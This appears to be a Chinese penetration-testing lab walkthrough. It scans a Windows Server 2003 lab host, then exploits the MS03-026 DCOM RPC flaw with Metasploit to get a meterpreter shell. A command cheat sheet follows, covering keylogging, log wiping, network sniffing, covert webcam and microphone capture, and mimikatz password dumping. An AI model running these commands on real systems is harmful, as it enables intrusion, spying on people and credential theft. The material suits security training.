0X01 信息收集
靶機的IP地址為:192.168.173.136
利用nmap工具掃描其開放端口、系統等
整理一下目標系統的相關信息
系統版本:Windows server 2003
開放的端口及服務:
21/tcp ftp
135/tcp msrpc
139/tcp netbios-ssn
445/tcp microsoft-ds
777/tcp multiling-http
1025/tcp NFS-or-IIS
1026/tcp LSA-or-nterm
1029/tcp ms-lsa
1030/tcp iad1
6002/tcp X11:2
7001/tcp afs3-callback
7002/tcp afs3-prserver
8099/tcp 未知服務
0X02 漏洞分析
從掃描出的端口發現,目標主機開啟了135端口,服務為msrpc(遠程過程調用服務),即Windows的RPC服務。
針對這個服務,我們就可以嘗試去利用一下。
0X03 漏洞利用
kali機打開Metaspolit:
root@kali:~# msfconsole
查找所有跟Windows RPC相關的漏洞攻擊:
msf5 > search dcom
使用MS-03-026 進行攻擊:
msf5 > use exploit/windows/dcerpc/ms03_026_dcom
為了實施攻擊,查看漏洞攻擊的選項和條件:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options
知道攻擊所需要的條件,接下來進行設置,只需要設置我們攻擊的目標主機即可:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136
設置好攻擊條件之后,接下來就進行攻擊:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit
執行攻擊命令之后,我們獲取到了目標主機的shell權限,現在,可以執行命令查看目標主機的一些東西,比如網絡配置信息:
meterpreter > ipconfig
如需進一步攻擊利用,可配合其他命令進一步操作。
0X04 meterpreter下相關命令
基本系統命令
——————————
shell 進入目標主機cmd shell
reboot 重啟目標主機
shutdown 關閉目標主機
sysinfo 查看目標主機系統信息
background 將當前會話放置后台
info 查看已有信息模塊
run 執行已有的模塊,輸入run后按tab鍵補全,會列出已有的腳本
clearav 清除windows中的應用程序日志、系統日志、安全日志
ipconfig 查看網絡配置信息
netstat 查看網絡連接信息
getproxy 查看代理信息
route 查看路由
arp 查看arp信息
進程列表:
——————————
getuid 獲取系統ID以及計算機名稱
getpid 獲取當前進程標識符
kill 結束進程
ps 列出正在運行中的進程
鼠標/鍵盤操作
——————————
keyscan_start 開啟按鍵記錄會話
keyscan_stop 終止按鍵記錄會話
keyscan_dump 轉儲從目標主機捕獲到的按鍵記錄
uictl enable mouse 啟用鼠標
uictl disable mouse 禁用鼠標
uictl enable keyboard 啟用鍵盤
uictl disable keyboard 禁用鍵盤
會話
——————————
enumdesktops 列舉所有可訪問到的桌面和工作站
getdesktop 獲取當前Meterpreter桌面
setdesktop 變更Meterpreter當前桌面
嗅探功能
——————————
use sniffer 加載嗅探功能
sniffer_interfaces 查看網卡
sniffer_start 開始對網卡執行嗅探
sniffer_stats 查看狀態
sniffer_stop 停止對網卡的嗅探
sniffer_dump 將捕獲到的目標主機上的數據轉儲到本地
攝像頭命令
——————————
webcam_list 列舉系統所有的攝像頭
webcam_snap 使用目標主機攝像頭拍照
record_mic 從主機的默認麥克風中記錄環境聲音
webcam_stream 通過攝像頭開啟視頻
遠程桌面/截屏
——————————
enumdesktops 查看可用的桌面
getdesktop 獲取當前meterpreter 關聯的桌面
set_desktop 設置meterpreter關聯的桌面 -h查看幫助
screenshot 截屏
use espia 或者使用espia模塊截屏 然后輸入screengrab
run vnc 使用vnc遠程桌面連接
抓取密碼
——————————
load mimikatz 查看幫助
wdigest 獲取Wdigest密碼
mimikatz_command -f samdump::hashes 執行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords